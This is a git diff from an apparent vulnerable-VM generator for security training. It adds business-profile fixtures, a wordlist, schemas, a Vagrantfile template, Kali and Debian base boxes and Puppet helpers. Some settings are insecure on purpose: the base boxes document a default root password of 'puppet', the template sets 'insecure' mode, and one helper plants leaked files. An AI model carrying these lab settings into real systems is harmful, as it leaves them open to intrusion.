"address": "105, Caedmon Hall, Headingley Campus",
"phone_number": "0113 81 28608",
"email_address": "C.Schreuders@leedsbeckett.ac.uk",
"username": "zschreuders",
"password": ""
},
{
"name": "Dr. Maurice Calvert",
"address": "117, Caedmon, Headingley Campus",
"phone_number": "0113 81 27429",
"email_address": "M.Calvert@leedsbeckett.ac.uk",
"username": "mcalvert",
"password": ""
},
{
"name": "Dr. John Elliott",
"address": "108, Caedmon, Headingley Campus",
"phone_number": "0113 81 27379",
"email_address": "J.Elliott@leedsbeckett.ac.uk",
"username": "jelliott",
"password": ""
}
],
"product_name": "University Education",
"intro_paragraph": [
"Computer forensics involves the analysis of digital devices such as hard drives to identify and investigate their contents. Computer security involves using knowledge of computer systems and networks to protect businesses and users from malicious attacks.",
"This course combines these two fields of national importance and will teach you practical investigative and 'hacking' techniques. You will develop the skills to undertake rigorous forensic analysis and implement robust security mechanisms.",
"This is a hands-on course where you will learn through doing, gaining an in-depth knowledge of how to hack a computer to be able to protect it. You will learn where a computer hides data and how to recover information from a device."
]
}

View File

@@ -0,0 +1,48 @@
{
"business_name": "Leeds Beckett- Leeds Law School",
"business_motto": "",
"business_address": "City Campus, Leeds LS1 3HE",
"domain": "leedsbeckett.ac.uk",
"office_telephone": "0113 81 23000",
"office_email": "study@leedsbeckett.ac.uk",
"industry": "Higher Education",
"manager": {
"name": "Deveral Capps",
"address": "306, Portland Building, City Campus",
"phone_number": "0113 81 26085",
"email_address": "d.capps@leedsbeckett.ac.uk",
"username": "d_capps",
"password": ""
},
"employees": [
{
"name": "Dr. Simon Hale-Ross",
"address": "306, Portland Building, City Campus",
"phone_number": "0113 8129526",
"email_address": "S.Haleross@leedsbeckett.ac.uk",
"username": "s_haleross",
"password": ""
},
{
"name": "Professor Simon Gardiner",
"address": "204, Rose Bowl, City Campus",
"phone_number": "0113 81 26414",
"email_address": "S.Gardiner@leedsbeckett.ac.uk",
"username": "s_gardiner",
"password": ""
},
{
"name": "Dr. Jessica Guth",
"address": "306, Portland Building, City Campus",
"phone_number": "0113 81 26403",
"email_address": "J.Guth@leedsbeckett.ac.uk",
"username": "j_guth",
"password": ""
}
],
"product_name": "University Education",
"intro_paragraph": [
"Our Law School sits in the heart of the great city of Leeds, the most important legal centre outside London and home to over 180 law firms employing in excess of 8,000 professionals. It is perfectly placed to ensure all our undergraduate, postgraduate, full and part-time students are able to mine the wealth of practical experience and employment opportunities available on our doorstep.",
"With state-of-the-art facilities, mentoring and career development opportunities, placements and a courtroom, students who choose Leeds Law School can expect a successful career founded on high calibre, practical teaching. We offer a broad variety of courses including our LLB, LLM Legal Practice (incorporating the LPC), LLM Qualifying Law Degree (incorporating the GDL) and LLM International Business Law, and each aims to give our graduates the enthusiasm, sharpness of mind and practical tools to thrive in competitive and fast-paced professional environments."
]
}

View File

@@ -0,0 +1,47 @@
{
"business_name": "Leeds Beckett- Music and Performing Arts",
"business_motto": "",
"business_address": "43 Church Wood Ave, Leeds LS16 5LF",
"domain": "leedsbeckett.ac.uk",
"office_telephone": "0113 81 23000",
"office_email": "study@leedsbeckett.ac.uk",
"industry": "Higher Education",
"manager": {
"name": "Dr Richard Stevens",
"address": "209, Caedmon, Headingley Campus",
"phone_number": "0113 81 23690",
"email_address": "R.C.Stevens@leedsbeckett.ac.uk",
"username": "r_stevens",
"password": ""
},
"employees": [
{
"name": "Dr. Laura Griffiths",
"address": "Reception, Priestley Hall, Headingley Campus",
"phone_number": "n/a",
"email_address": "Laura.Griffiths@leedsbeckett.ac.uk",
"username": "l_griffiths",
"password": ""
},
{
"name": "Carl Flattery",
"address": "104, Caedmon, Headingley Campus",
"phone_number": "0113 81 27372",
"email_address": "C.Flattery@leedsbeckett.ac.uk",
"username": "c_flattery",
"password": ""
},
{
"name": "Sam Nicholls",
"address": "212, Caedmon, Headingley Campus",
"phone_number": "0113 81 23726",
"email_address": "S.Nicholls@leedsbeckett.ac.uk",
"username": "s_nicholls",
"password": ""
}
],
"product_name": "University Education",
"intro_paragraph": [
"The School of Film, Music & Performing Arts fosters a culture of creation and participation. We are proud shapers of, and contributors to, the cultural life of this great Northern city a city that is the original birthplace of film. We nurture the arts pioneers of the future: influencers who will not just reflect the outside world, but impact upon it."
]
}

View File

@@ -0,0 +1,48 @@
{
"business_name": "Yorkshire Personal Health",
"business_motto": "We'll have you as good as new in no time.",
"business_address": "159 Longlands St, Bradford BD1 2PX",
"domain": "yorkspersonalhealth.co.uk",
"office_telephone": "01274 200700",
"office_email": "info@yorkspersonalhealth.co.uk",
"industry": "Medical Services",
"manager": {
"name": "Angela Dickinson",
"address": "76103 Joshuah Path, Port Magali, Cambridgeshire, R1 1TR",
"phone_number": "01274 200700 ext 100",
"email_address": "a.dickinson@yorkspersonalhealth.co.uk",
"username": "dickinson_a",
"password": ""
},
"employees": [
{
"name": "Abdullah Carroll",
"address": "Office A, 160 Longlands St, Bradford BD1 2PX",
"phone_number": "01274 200700 ext 101",
"email_address": "a.carroll@yorkspersonalhealth.co.uk",
"username": "carroll_a",
"password": ""
},
{
"name": "Annie Williamson",
"address": "Office B, 160 Longlands St, Bradford BD1 2PX",
"phone_number": "01274 200700 ext 103",
"email_address": "a.williamson@yorkspersonalhealth.co.uk",
"username": "williamson_a",
"password": ""
},
{
"name": "Jammie Marks",
"address": "Office B, 160 Longlands St, Bradford BD1 2PX",
"phone_number": "01274 200700 ext 110",
"email_address": "j.marks@yorkspersonalhealth.co.uk",
"username": "marks_j",
"password": ""
}
],
"product_name": "Check up",
"intro_paragraph": [
"A health assessment is more than a check up. It can be the start of a journey towards better health.",
"We use our health expertise to build a clear picture of where your current health is and identify potential future health risks. After your health assessment, well give you guidance and support to help you become healthier today and in the future."
]
}

View File

@@ -0,0 +1,47 @@
{
"business_name": "",
"business_motto": "",
"business_address": "",
"domain": "",
"office_telephone": "",
"office_email": "",
"industry": "",
"manager": {
"name": "",
"address": "",
"phone_number": "",
"email_address": "",
"username": "",
"password": ""
},
"employees": [
{
"name": "",
"address": "",
"phone_number": "",
"email_address": "",
"username": "",
"password": ""
},
{
"name": "",
"address": "",
"phone_number": "",
"email_address": "",
"username": "",
"password": ""
},
{
"name": "",
"address": "",
"phone_number": "",
"email_address": "",
"username": "",
"password": ""
}
],
"product_name": "",
"intro_paragraph": [
""
]
}

View File

@@ -0,0 +1,48 @@
{
"business_name": "Speedy Pizzas",
"business_motto": "Pizza done quick.",
"business_address": "195 Headingley Lane, Headingley, Leeds, LS6 1BN",
"domain": "speedypizzas.co.uk",
"office_telephone": "0113 123 3214",
"office_email": "info@speedypizzas.co.uk",
"industry": "Food",
"manager": {
"name": "David Sand",
"address": "195 Headingley Lane, Headingley, Leeds, LS6 1BN",
"phone_number": "07879 635412",
"email_address": "dave@speedypizzas.co.uk",
"username": "d_sand",
"password": ""
},
"employees": [
{
"name": "Cydney Hermann",
"address": "195 Headingley Lane, Headingley, Leeds, LS6 1BN",
"phone_number": "0113 123 3214",
"email_address": "cydney@speedypizzas.co.uk",
"username": "c_hermann",
"password": ""
},
{
"name": "Lori Marshall",
"address": "195 Headingley Lane, Headingley, Leeds, LS6 1BN",
"phone_number": "0113 123 3214",
"email_address": "lori@speedypizzas.co.uk",
"username": "l_marshall",
"password": ""
},
{
"name": "Andrea Martinez",
"address": "195 Headingley Lane, Headingley, Leeds, LS6 1BN",
"phone_number": "0113 123 3214",
"email_address": "andrea@speedypizzas.co.uk",
"username": "a_martinez",
"password": ""
}
],
"product_name": "Pizza",
"intro_paragraph": [
"Welcome to speedy pizzas. Piping hot food either in store or delivered to your door. Pizza takeaway, parmesan, kebabs and much more.",
"We are based in the centre of Headingley on Headingley lane and will deliver up to 3 miles for free, £1 per additional mile. Red hot pizza on delivery or your money back."
]
}

View File

@@ -0,0 +1,336 @@
dropbear
abaia
abath
adze
aethoneagle
afanc
ahool
akkorokamui
ala
alectryon
alkonost
allocamelus
amalthea
ammut
anansi
anemoi
angel
arachne
ariel
aries
arion
automaton
azeban
baku
balrog
barefrontedhoodwink
basilisk
bast
behemoth
bennu
berserker
bigfoot
bugbear
bunyip
buraq
caladrius
callisto
camazotz
capricornus
centaur
cetan
chamrosh
chimera
chiron
cinnamonbird
cipactli
devil
devilbird
djinn
dragon
drake
dwarf
echidna
elf
emela-ntouka
encantado
ent
familiar
faun
fionnuala
firebird
gandaberunda
gargoyle
gef
giant
giantpenguin
gilledantelope
goblin
grootslang
gunni
haizum
harpy
heqet
hibagon
hobbit
horus
huitzilopochtli
huorn
hydra
ichneumon
ichthyocentaurs
inugami
ipotane
isonade
kamaitachi
karkadann
kasairex
khepri
khnum
kongamato
kraken
kujata
kun
kurma
lamia
lavellan
lindorm
longma
makara
mapinguari
mermaid
merman
minokawa
minotaur
mothman
mujina
naga
namazu
nandibear
nandibull
nekomata
ngoubou
ningyo
nuckelavee
nue
olitiau
onocentaur
oozlumbird
orc
ouroboros
owlman
pabilsag
panther
peluda
peryton
phantomkangaroo
pooka
python
qareen
qilin
qiqirn
qliphoth
quinotaur
ra
rabisu
radande
ragana
rakshasa
redcap
reichsadler
rephaite
revenant
riva
rokurokubi
rompo
rougarou
rusalka
saci
sacipererê
sagari
sakabashira
samebito
samodiva
sampaati
sandman
sandwalker
santelmo
sânziană
sarngika
sarugami
satori
satyrus
sceadugenga
scitalis
scylla
sekhmet
seko
selket
seps
serpent
serpopard
shabti
shachihoko
shade
shedim
shellycoat
shenlong
shibaten
shikigami
shikome
shinigami
shirouneri
shisa
shishi
shtriga
shunoban
sigbin
sileni
simargl
singa
sirrush
sisiutl
skookum
skrzak
skvader
slenderman
sluagh
sobek
soragami
soucouyant
spearfinger
spectre
spiriduş
spriggan
sprite
squonk
strigoi
struthopodes
strzyga
suangi
succubus
sudice
sunekosuri
surma
suzaku
sylvan
syrbotae
tachash
taimatsumaru
takam
tangie
tantankororin
tanuki
taotie
tapairu
tartalo
tartaruchi
tatsu
taurokampoi
tavara
taweret
tecumbalam
tennin
tepegoz
theriocephalus
thoth
tiangou
tianlong
tibicena
tigmamanukan
tigris
tikoloshe
timingila
tipua
titan
tiyanak
tizheruk
tlahuelpuchi
tokeloshe
tomte
topielec
toyol
trasgo
trauco
trenti
tripurasura
tritons
trow
tsuchigumo
turehu
turul
typhon
ubume
uchchaihshravas
undead
undine
unhcegila
unktehi
unktehila
upinis
urayuli
urmahlullu
ushioni
utukku
uwan
valkyrie
valravn
varaha
vedrfolnir
veļi
veo
vetala
vielfras
vila
vilkacis
vodyanoy
vrykolakas
vulkodlak
waldgeist
wani
wekufe
wendigo
werecat
whitestag
wirrycow
wolpertinger
wondjina
wraith
wulver
wyrm
xana
xelhua
yacumama
yacuruna
yaksha
yakshi
yakshini
yale
yali
yallerybrown
yalungur
yanari
yaoguai
yatagarasu
yeren
yethhound
yobuko
yong
yosuzume
ypotryll
yukinko
yuxa
zahhak
zamzummim
zaratan
zburator
zeus
zhulong
zin
zlatorog
zmeu
zmiy
zombie
zorigami
zu
zuijin

View File

@@ -41,6 +41,7 @@
<xs:restriction base="xs:string">
<xs:enumeration value="server"/>
<xs:enumeration value="desktop"/>
<xs:enumeration value="attack"/>
<xs:enumeration value="cli"/>
</xs:restriction>
</xs:simpleType>
@@ -49,6 +50,7 @@
<xs:element name="platform" type="platformOptions" minOccurs="1" maxOccurs="unbounded"/>
<xs:element name="distro" type="xs:string" minOccurs="1" maxOccurs="1"/>
<xs:element name="url" type="xs:string" minOccurs="1" maxOccurs="1"/>
<xs:element name="ovirt_template" type="xs:string" minOccurs="0" maxOccurs="unbounded"/>
<xs:element name="packerfile_path" type="xs:string" minOccurs="0" maxOccurs="1"/>
<xs:element name="product_key" type="xs:string" minOccurs="0" maxOccurs="1"/>
@@ -57,7 +59,6 @@
<xs:element name="reference" type="xs:string" minOccurs="0" maxOccurs="unbounded"/>
<xs:element name="software_name" type="xs:string" minOccurs="0" maxOccurs="unbounded"/>
<xs:element name="software_license" type="xs:string" minOccurs="0" maxOccurs="unbounded"/>
<xs:element name="ovirt_template" type="xs:string" minOccurs="0" maxOccurs="unbounded"/>
<!-- cannot co-exist with a system matching ALL of the optionally specified values (can be repeated for OR)-->
<xs:element name="conflict" minOccurs="0" maxOccurs="unbounded">

View File

@@ -23,6 +23,7 @@
<xs:restriction base="xs:string">
<xs:enumeration value="MIT"/>
<xs:enumeration value="Apache v2"/>
<xs:enumeration value="GPLv3"/>
</xs:restriction>
</xs:simpleType>
</xs:element>

View File

@@ -126,6 +126,9 @@
</xs:complexType>
<xs:complexType name="NetworkType">
<xs:sequence>
<xs:element name="input" type="InputElements" minOccurs="0" maxOccurs="unbounded" />
</xs:sequence>
<xs:attribute name="module_path" type="xs:string"/>
<xs:attribute name="name" type="xs:string"/>

View File

@@ -23,6 +23,7 @@
<xs:restriction base="xs:string">
<xs:enumeration value="MIT"/>
<xs:enumeration value="Apache v2"/>
<xs:enumeration value="GPLv3"/>
</xs:restriction>
</xs:simpleType>
</xs:element>

View File

@@ -5,8 +5,11 @@
# <%= @time %>
# Based on <%= @scenario %>
<% require 'json'
require 'base64' -%>
<% prefix = @options[:prefix] ? @options[:prefix] + '_' : ''-%>
require 'base64'
require 'securerandom' -%>
<% scenario_name = @scenario.split('/').last.split('.').first + '-'
prefix = @options[:prefix] ? (@options[:prefix] + '-' + scenario_name) : ('SecGen-' + scenario_name) -%>
VAGRANTFILE_API_VERSION = "2"
Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
@@ -14,6 +17,7 @@ Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
<% system.module_selections.each do |selected_module|
if selected_module.module_type == 'base'
@base_type = selected_module.attributes['type']
@ovirt_template = selected_module.attributes['ovirt_template']
@cpu_word_size = selected_module.attributes['cpu_word_size'].first.downcase
if (@options.has_key? :ovirtuser) && (@options.has_key? :ovirtpass)
@ovirt_base_template = selected_module.attributes['ovirt_template'].first
@@ -48,7 +52,7 @@ Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
<%= if @options.has_key? :cpu_cores
" ovirt.cpu_cores = #{@options[:cpu_cores]}\n"
end -%>
ovirt.console = 'vnc'
ovirt.console = 'spice'
ovirt.insecure = true
ovirt.filtered_api = true
ovirt.debug = true
@@ -90,6 +94,12 @@ Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
end -%>
end
<% end %>
<% # Adds line that stops cloud-init from attempting to grab meta-data as eth0 is overwritten with provided networks.
# TODO: Remove when mutli-network vagrant-plugin issue is resolved
if (@options.has_key? :ovirtuser) && (@options.has_key? :ovirtpass) -%>
<%= system.name %>.vm.provision 'shell', inline: "echo 'datasource_list: [ None ] '> /etc/cloud/cloud.cfg.d/90_dpkg.cfg"
<% end -%>
# SecGen datastore
# <%= JSON.generate($datastore) %>
@@ -97,10 +107,15 @@ Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
<% system.module_selections.each do |selected_module| -%>
<%= selected_module.to_s_comment -%>
<% if selected_module.module_type == 'network' and selected_module.received_inputs.include? 'IP_address' %>
<%= ' # This module has a datastore entry for IP_address, using that instead of the default.' -%>
<% elsif selected_module.module_type == 'network' and @options.has_key? :ip_ranges -%>
<%= ' # This module has a command line ip_range, using that instead of the default.' -%>
<% end -%>
<% case selected_module.module_type
when 'base' -%>
<% if (@options.has_key? :ovirtuser) && (@options.has_key? :ovirtpass) %> # TODO
<%= system.name %>.vm.hostname = '<%= "#{prefix}SecGen-#{system.name}-#{Time.new.strftime("%Y%m%d-%H%M")}".tr('_', '-') %>'
<%= system.name %>.vm.hostname = '<%= "#{prefix}#{system.name}".tr('_', '-') %>'
<%= system.name %>.vm.box = 'ovirt4'
<%= system.name %>.vm.box_url = 'https://github.com/myoung34/vagrant-ovirt4/blob/master/example_box/dummy.box?raw=true'
<% else %>
@@ -114,17 +129,25 @@ Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
<%= system.name %>.vm.network :forwarded_port, guest: 5985, host: 5985, id: "winrm", auto_correct: true
<% end %>
<% when 'network' -%>
<% if selected_module.attributes['range'].first.nil? || selected_module.attributes['range'].first == "dhcp" -%>
<% if (selected_module.attributes['range'].first.nil? || selected_module.attributes['range'].first == "dhcp") and (!selected_module.received_inputs.include? 'IP_address' and !@options[:ip_ranges])-%>
<% if (@options.has_key? :ovirtnetwork) && (@options.has_key? :ovirtuser) && (@options.has_key? :ovirtpass) %>
<%= system.name %>.vm.network :<%= selected_module.attributes['type'].first %>, type: "dhcp", :ovirt__network_name => '<%= "#{@options[:ovirtnetwork]}" %>'
<% else %>
<%= system.name %>.vm.network :<%= selected_module.attributes['type'].first %>, type: "dhcp"
<%= system.name %>.vm.network :<%= selected_module.attributes['type'].first %>, type: "dhcp", auto_config: false
<% end %>
<% else -%>
<% if (@options.has_key? :ovirtuser) && (@options.has_key? :ovirtpass) %>
<%= system.name %>.vm.network :<%= selected_module.attributes['type'].first %>, :ovirt__ip => "<%= resolve_network(selected_module.attributes['range'].first)%>", :ovirt__network_name => '<%= "#{@options[:ovirtnetwork]}" %>'
<% if @ovirt_template and @ovirt_template.include? 'kali_linux_msf' %>
<%= system.name %>.vm.provision 'shell', inline: "echo \"auto lo\niface lo inet loopback\n\nauto eth0\niface eth0 inet static\n\taddress <%= resolve_network(selected_module)%>\" > /etc/network/interfaces"
<%= system.name %>.vm.provision 'shell', inline: "echo '' > /etc/environment"
<% elsif @ovirt_template and @ovirt_template.include? 'debian_desktop_kde' %>
<%= system.name %>.vm.provision 'shell', inline: "echo \"\nauto eth1\niface eth1 inet static\n\taddress <%= resolve_network(selected_module)%>\" >> /etc/network/interfaces"
<%= system.name %>.vm.provision 'shell', inline: "echo '' > /etc/environment"
<% else %>
<%= system.name %>.vm.network :<%= selected_module.attributes['type'].first %>, :ovirt__ip => "<%= resolve_network(selected_module)%>", :ovirt__network_name => '<%= "#{@options[:ovirtnetwork]}" %>'
<% end %>
<% else %>
<%= system.name %>.vm.network :<%= selected_module.attributes['type'].first %>, ip: "<%= resolve_network(selected_module.attributes['range'].first)%>"
<%= system.name %>.vm.network :<%= selected_module.attributes['type'].first %>, ip: "<%= resolve_network(selected_module)%>"
<% end %>
<% end -%>
<% when 'vulnerability', 'service', 'utility', 'build' -%>
@@ -132,9 +155,18 @@ Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
<%= system.name %>.vm.provision "puppet" do | <%=module_name%> |
<% # if there are facter variables to define
if selected_module.received_inputs != {} -%>
<% json_inputs = JSON.generate(selected_module.received_inputs) -%>
<% json_inputs = JSON.generate(selected_module.received_inputs)
b64_json_inputs = Base64.strict_encode64(json_inputs)
# save the inputs in a randomly named file in the
# project out directory of the secgen_functions module
rand = SecureRandom.hex().to_s
dir = "#{@out_dir}/puppet/#{system.name}/modules/secgen_functions/files/json_inputs"
FileUtils.mkdir_p(dir) unless File.exists?(dir)
Print.verbose "Writing #{selected_module.module_path_name} input to: #{dir}/#{rand}"
File.write("#{dir}/#{rand}", b64_json_inputs)
-%>
<%= module_name%>.facter = {
"base64_inputs" => '<%= Base64.strict_encode64(json_inputs)%>'
"base64_inputs_file" => '<%= rand %>',
}
<% end -%>
<%=module_name%>.module_path = "<%="puppet/#{system.name}/modules"%>"

View File

@@ -3,11 +3,11 @@
<base xmlns="http://www.github/cliffe/SecGen/base"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/base">
<name>Debian 32bit with Puppet</name>
<name>Debian 7 Wheezy Server</name>
<author>Z. Cliffe Schreuders</author>
<module_license>GPLv3</module_license>
<description>Based on the Official Puppet Vagrant box. Debian 7.8 (wheezy) 32-bit (i386), Puppet 4.3.2 / Puppet Enterprise 2015.3.2 (agent).
This is the primary base box used during development.</description>
This is the primary base box used during development. For testing purposes, the default root password is puppet.</description>
<cpu_word_size>32-bit</cpu_word_size>
<type>server</type>
<type>cli</type>
@@ -15,11 +15,9 @@
<platform>linux</platform>
<platform>unix</platform>
<distro>Debian 7.8 (wheezy) 32-bit (i386)</distro>
<url>http://atlas.hashicorp.com/puppetlabs/boxes/debian-7.8-32-puppet/versions/1.0.4/providers/virtualbox.box</url>
<url>https://app.vagrantup.com/secgen/boxes/debian_wheezy_puppet/versions/1.0.0/providers/virtualbox.box</url>
<ovirt_template>debian_server</ovirt_template>
<reference>https://atlas.hashicorp.com/puppetlabs</reference>
<software_license>various</software_license>
<ovirt_template>debian_server</ovirt_template>
</base>
</base>

View File

@@ -0,0 +1,24 @@
<?xml version="1.0"?>
<base xmlns="http://www.github/cliffe/SecGen/base"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/base">
<name>Debian 7 Wheezy Desktop KDE</name>
<author>Z. Cliffe Schreuders</author>
<module_license>GPLv3</module_license>
<description>Based on the Official Puppet Vagrant box. Debian 7.8 (wheezy) 32-bit (i386), Puppet 4.3.2 / Puppet Enterprise 2015.3.2 (agent).
Plus KDE and some useful tools.
For testing purposes, the default root password is puppet.</description>
<cpu_word_size>32-bit</cpu_word_size>
<type>desktop</type>
<platform>linux</platform>
<platform>unix</platform>
<distro>Debian 7.8 (wheezy) 32-bit (i386)</distro>
<url>https://app.vagrantup.com/secgen/boxes/debian_wheezy_kde_puppet/versions/1.0.0/providers/virtualbox.box</url>
<ovirt_template>debian_desktop_kde</ovirt_template>
<reference>https://atlas.hashicorp.com/puppetlabs</reference>
<software_license>various</software_license>
</base>

View File

@@ -0,0 +1,22 @@
<?xml version="1.0"?>
<base xmlns="http://www.github/cliffe/SecGen/base"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/base">
<name>Kali Light, XFCE and Puppet</name>
<author>Z. Cliffe Schreuders</author>
<module_license>GPLv3</module_license>
<description>Kali Light 2017.1 XFCE minimal install, with puppet.</description>
<cpu_word_size>64-bit</cpu_word_size>
<type>attack</type>
<type>desktop</type>
<platform>linux</platform>
<platform>unix</platform>
<distro>Kali Linux 2017.1</distro>
<url>https://app.vagrantup.com/cliffe/boxes/kali-light/versions/1.0.0/providers/virtualbox.box</url>
<reference>https://app.vagrantup.com/cliffe</reference>
<software_license>various</software_license>
</base>

View File

@@ -0,0 +1,23 @@
<?xml version="1.0"?>
<base xmlns="http://www.github/cliffe/SecGen/base"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/base">
<name>Kali Light, MSF, XFCE and Puppet</name>
<author>Z. Cliffe Schreuders</author>
<module_license>GPLv3</module_license>
<description>Kali Light 2017.1 XFCE minimal install, with metasploit framework and puppet.</description>
<cpu_word_size>64-bit</cpu_word_size>
<type>attack</type>
<type>desktop</type>
<platform>linux</platform>
<platform>unix</platform>
<distro>Kali Linux 2017.1</distro>
<url>https://app.vagrantup.com/secgen/boxes/kali_lite_msf_puppet/versions/1.0.1/providers/virtualbox.box</url>
<ovirt_template>kali_linux_msf</ovirt_template>
<reference>https://app.vagrantup.com/cliffe</reference>
<software_license>various</software_license>
</base>

View File

@@ -0,0 +1,6 @@
function secgen_functions::get_parameters($base64_inputs_file) {
$b64_inputs = file("secgen_functions/json_inputs/$base64_inputs_file")
$json_inputs = base64('decode', $b64_inputs)
$secgen_parameters = parsejson($json_inputs)
$secgen_parameters
}
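The Vagrantfile template above writes each module's inputs into a randomly named file as Base64-encoded JSON, and this Puppet function reads them back and decodes them at catalog compile time. A minimal Ruby sketch of the same round-trip, using made-up input data:

```ruby
require 'json'
require 'base64'
require 'securerandom'
require 'tmpdir'

# Encode side (what the ERB Vagrantfile template does): serialise the
# module inputs to JSON, Base64-encode, write to a randomly named file.
inputs = { 'root_password' => ['puppet'], 'remove_history' => ['true'] } # example data
dir = Dir.mktmpdir
filename = SecureRandom.hex
File.write(File.join(dir, filename), Base64.strict_encode64(JSON.generate(inputs)))

# Decode side (what secgen_functions::get_parameters does via Puppet's
# file(), base64('decode', ...) and parsejson() functions).
decoded = JSON.parse(Base64.decode64(File.read(File.join(dir, filename))))
puts decoded['root_password'].first # => "puppet"
```

This avoids passing large Base64 blobs through facter variables directly; only the short random filename crosses the Vagrant/Puppet boundary.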

View File

@@ -2,6 +2,13 @@ define secgen_functions::leak_file($leaked_filename, $storage_directory, $string
if ($leaked_filename != ''){
$path_to_leak = "$storage_directory/$leaked_filename"
# create the directory tree, incase the file name has extra layers of directories
exec { "$leaked_from-$path_to_leak":
path => ['/bin', '/usr/bin', '/usr/local/bin', '/sbin', '/usr/sbin'],
command => "mkdir -p `dirname $path_to_leak`;chown $owner. `dirname $path_to_leak`",
provider => shell,
}
# If the file already exists append to it, otherwise create it.
if (defined(File[$path_to_leak])){
notice("File with that name already defined, appending leaked strings instead...")

View File

@@ -6,7 +6,7 @@
<name>SecGen Puppet Functions</name>
<author>Thomas Shaw</author>
<module_license>MIT</module_license>
<description>SecGen functions module encapuslates commonly used functions within secgen (e.g. leaking files,
<description>SecGen functions module encapsulates commonly used functions within secgen (e.g. leaking files,
overshare, flags etc.) into puppet resource statements.
</description>

View File

@@ -1,6 +1,5 @@
class cleanup::init {
$json_inputs = base64('decode', $::base64_inputs)
$secgen_params = parsejson($json_inputs)
$secgen_params = secgen_functions::get_parameters($::base64_inputs_file)
$remove_history = str2bool($secgen_params['remove_history'][0])
$root_password = $secgen_params['root_password'][0]
$clobber_file_times = str2bool($secgen_params['clobber_file_times'][0])

View File

@@ -0,0 +1,35 @@
#!/usr/bin/ruby
require 'base64'
require_relative '../../../../../lib/objects/local_string_encoder.rb'
class CSVEncoder < StringEncoder
def initialize
super
self.module_name = 'CSV Encoder'
end
def encode_all()
require 'csv'
require 'json'
csv_string = CSV.generate do |csv|
# each_with_index: count must be the element index so the header row is written once
strings_to_encode.each_with_index do |string_to_encode, count|
row = []
header = []
JSON.parse(string_to_encode).each do |hash|
header << hash[0]
row << hash[1]
end
if count == 0
csv << header
end
csv << row
end
end
self.outputs << csv_string
end
end
CSVEncoder.new.run

View File

@@ -0,0 +1,19 @@
<?xml version="1.0"?>
<encoder xmlns="http://www.github/cliffe/SecGen/encoder"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/encoder">
<name>CSV Encoder</name>
<author>Z. Cliffe Schreuders</author>
<module_license>MIT</module_license>
<description>Converts all of the inputs into a single CSV output. Accepts one layer of JSON hashes. For example, outputs from person generator.</description>
<type>csv</type>
<platform>linux</platform>
<platform>windows</platform>
<read_fact>strings_to_encode</read_fact>
<output_type>csv</output_type>
</encoder>

View File

@@ -0,0 +1,61 @@
#!/usr/bin/ruby
require_relative '../../../../../lib/objects/local_string_encoder.rb'
class RandomSelectorEncoder < StringEncoder
attr_accessor :position
attr_accessor :file_path
def initialize
super
self.module_name = 'Random Line Selector'
self.file_path = ''
self.position = ''
end
# @return [Array[string]] containing selected string from file
def encode_all
selected_string = ''
unless file_path.include? '..'
path = "#{ROOT_DIR}/#{file_path}"
file_lines = File.readlines(path)
selected_string = if !position.nil? && (position != '')
file_lines[position.to_i - 1]
else
file_lines.sample
end
end
outputs << selected_string.chomp
end
def process_options(opt, arg)
super
case opt
# Removes any non-alphabet characters
when '--position'
position << arg
when '--file_path'
file_path << arg
else
# do nothing
end
end
def get_options_array
super + [['--position', GetoptLong::OPTIONAL_ARGUMENT],
['--file_path', GetoptLong::OPTIONAL_ARGUMENT]]
end
def encoding_print_string
string = "file_path: #{file_path}"
unless position.to_s.empty?
string += print_string_padding + "position: #{position}"
end
string
end
end
RandomSelectorEncoder.new.run
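The selection logic in encode_all is straightforward: a present, non-empty position picks that 1-indexed line, otherwise a line is sampled at random. A standalone sketch against a throwaway wordlist (the contents here are invented):

```ruby
require 'tempfile'

# Build a small stand-in wordlist file.
file = Tempfile.new('wordlist')
file.write("dropbear\nbunyip\nyowie\n")
file.rewind

lines = file.readlines
position = '2' # 1-indexed: in [a, b, c], a is pos 1, b is pos 2
selected = if !position.nil? && position != ''
             lines[position.to_i - 1] # explicit position wins
           else
             lines.sample # otherwise pick a random line
           end
puts selected.chomp # => "bunyip"
```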

View File

@@ -0,0 +1,21 @@
<?xml version="1.0"?>
<encoder xmlns="http://www.github/cliffe/SecGen/encoder"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/encoder">
<name>Random Line Selector</name>
<author>Thomas Shaw</author>
<module_license>MIT</module_license>
<description>Randomly selects one of the lines from a file and discards the rest.
Optionally pick position in a list (indexed from 1 - in the list [a,b,c] a is in pos 1, b is in pos 2, etc.)
</description>
<type>line_selector</type>
<platform>linux</platform>
<platform>windows</platform>
<read_fact>file_path</read_fact>
<read_fact>position</read_fact>
<output_type>selected_string</output_type>
</encoder>

View File

@@ -10,6 +10,7 @@
<type>string_generator</type>
<type>address_generator</type>
<type>address_generator_uk</type>
<type>address</type>
<type>local_calculation</type>
<platform>linux</platform>

View File

@@ -3,12 +3,13 @@
<generator xmlns="http://www.github/cliffe/SecGen/generator"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/generator">
<name>Industry Generator</name>
<name>Credit Card Number Generator</name>
<author>Thomas Shaw</author>
<module_license>MIT</module_license>
<description>Industry generator using the Forgery ruby gem.</description>
<description>Credit card number generator using the Credy ruby gem.</description>
<type>credit_card</type>
<type>credit_card_generator</type>
<type>personal_sensitive</type>
<type>local_calculation</type>
<platform>linux</platform>
<platform>windows</platform>

View File

@@ -0,0 +1,17 @@
#!/usr/bin/ruby
require_relative '../../../../../lib/objects/local_string_generator.rb'
class NINGenerator < StringGenerator
def initialize
super
self.module_name = 'National Insurance Number Generator'
end
def generate
